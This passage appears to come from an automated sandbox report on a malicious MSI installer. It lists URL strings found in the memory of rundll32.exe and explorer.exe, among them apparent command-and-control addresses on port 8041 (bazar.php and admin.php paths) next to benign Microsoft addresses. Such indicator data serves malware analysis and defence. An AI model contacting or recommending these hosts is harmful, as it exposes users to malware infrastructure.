                  Source: rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/bazar.phps
                  Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/in.com:8041/
                  Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/net.com:8041/admin.php
                  Source: rundll32.exe, 00000006.00000003.1720996678.0000016AD2816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/s%
                  Source: rundll32.exe, 00000006.00000003.2529789564.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/u
                  Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/zar.php
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
                  Source: explorer.exe, 00000009.00000002.3816713728.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1795302948.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                  Source: rundll32.exe, 00000006.00000003.2831885179.0000016AD2814000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788308588.0000016AD2818000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2818000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com/
                  Source: rundll32.exe, 00000006.00000003.2831885179.0000016AD2814000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788308588.0000016AD2818000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2818000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com/S%
                  Source: rundll32.exe, 00000006.00000003.2241985447.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2769645862.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/
                  Source: rundll32.exe, 00000006.00000003.3320385822.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2769645862.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2529789564.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2241985447.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.php
                  Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.php4
                  Source: rundll32.exe, 00000006.00000003.3320385822.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.phpV
                  Source: rundll32.exe, 00000006.00000003.1812614534.0000016AD2825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.phpx
                  Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD28BD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3320385822.0000016AD28BD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3318968115.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.php
                  Source: rundll32.exe, 00000006.00000003.2769645862.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.php%
                  Source: rundll32.exe, 00000006.00000003.1788308588.0000016AD2825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.php.
                  Source: rundll32.exe, 00000006.00000003.3320385822.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD2825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.php6
                  Source: rundll32.exe, 00000006.00000003.1788308588.0000016AD2825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.phpe
                  Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD28BD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3320385822.0000016AD28BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.phpu
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
                  Source: explorer.exe, 00000009.00000003.3074047960.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3073651112.000000000C58E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3816713728.000000000C4A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3816713728.000000000C596000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3078648933.000000000C4CC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3811134225.000000000913F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/
                  Source: explorer.exe, 00000009.00000003.3073651112.000000000C58E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/.7
                  Source: explorer.exe, 00000009.00000002.3811134225.000000000913F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/1n8J
                  Source: explorer.exe, 00000009.00000002.3811134225.000000000913F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/3
                  Source: explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/5117-2476756634-1003
                  Source: explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/5117-2476756634-1003J&
                  Source: explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/N
                  Source: explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/SIE
                  Source: explorer.exe, 00000009.00000002.3816713728.000000000C4A3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/T
                  Source: explorer.exe, 00000009.00000002.3816713728.000000000C4A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3811134225.000000000913F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/r
                  Source: explorer.exe, 00000009.00000003.3074047960.000000000913F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/r5
                  Source: explorer.exe, 00000009.00000002.3816713728.000000000C4A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3081083635.000000000325F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3078648933.000000000C4CC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/
                  Source: explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3816713728.000000000C12D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/2476756634-1003
                  Source: explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/2476756634-1003j
                  Source: explorer.exe, 00000009.00000003.3081083635.000000000325F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/7
                  Source: explorer.exe, 00000009.00000002.3811134225.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/E
                  Source: explorer.exe, 00000009.00000003.3081083635.000000000325F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/MenuArray_151436-
                  Source: explorer.exe, 00000009.00000002.3816713728.000000000C4A3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/O
                  Source: explorer.exe, 00000009.00000002.3805949216.0000000003256000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3081083635.000000000325F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/c
                  Source: explorer.exe, 00000009.00000003.3073651112.000000000C58E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/hanced
                  Source: explorer.exe, 00000009.00000002.3816713728.000000000C4A3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/r
                  Source: explorer.exe, 00000009.00000003.3078648933.000000000C4CC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/s
                  Source: explorer.exe, 00000009.00000002.3805851465.0000000003249000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/z
                  Source: explorer.exe, 00000009.00000002.3810313194.00000000085CE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://opewolumeras.com/test/
                  Source: explorer.exe, 00000009.00000002.3816713728.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1795302948.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                  Source: explorer.exe, 00000009.00000002.3816713728.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1795302948.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
                  Source: rundll32.exe, 00000006.00000003.1608485386.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1513808146.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1450359147.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com/
                  Source: rundll32.exe, 00000006.00000003.1457055405.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1532906794.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1463527230.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD2816000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1522469474.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1543477822.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2769645862.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1642587967.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD2816000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1608485386.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1513792190.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD2817000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/
                  Source: rundll32.exe, 00000006.00000003.2769645862.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/:
                  Source: rundll32.exe, 00000006.00000003.1707394082.0000016AD2816000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD2816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/C%m
                  Source: rundll32.exe, 00000006.00000003.1532906794.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD2816000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1522469474.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1543477822.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1642587967.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD2816000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1608485386.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD2817000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/G%i
                  Source: rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2769645862.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.php
                  Source: rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.php/4Q
                  Source: rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.php;
                  Source: rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.phpL
                  Source: rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.phpT
                  Source: rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.phpV4h
                  Source: rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.phpl4
                  Source: rundll32.exe, 00000006.00000003.2769645862.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.phpo
                  Source: rundll32.exe, 00000006.00000003.2831581713.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/azar.php
                  Source: rundll32.exe, 00000006.00000003.1608485386.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3320385822.0000016AD284A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD284B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1513808146.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/bazar.php
                  Source: rundll32.exe, 00000006.00000003.2831581713.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/bazar.phpK
                  Source: rundll32.exe, 00000006.00000003.2831581713.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/bazar.phpM
                  Source: rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/bazar.phpT
                  Source: rundll32.exe, 00000006.00000003.2831581713.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/bazar.phpV
                  Source: rundll32.exe, 00000006.00000002.3806960188.0000016AD28D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/bazar.phpiP5
                  Source: rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/bazar.phpj
                  Source: rundll32.exe, 00000006.00000003.2831581713.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/bazar.php~
                  Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/j
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                  Source: explorer.exe, 00000009.00000000.1792832688.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2277712034.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3074047960.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
                  Source: explorer.exe, 00000009.00000002.3816713728.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1795302948.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                  Source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.drString found in binary or memory: https://www.advancedinstaller.com
                  Source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                  Source: explorer.exe, 00000009.00000000.1791266554.00000000071A4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.pollensense.com/
                  Source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.drString found in binary or memory: https://www.thawte.com/cps0/
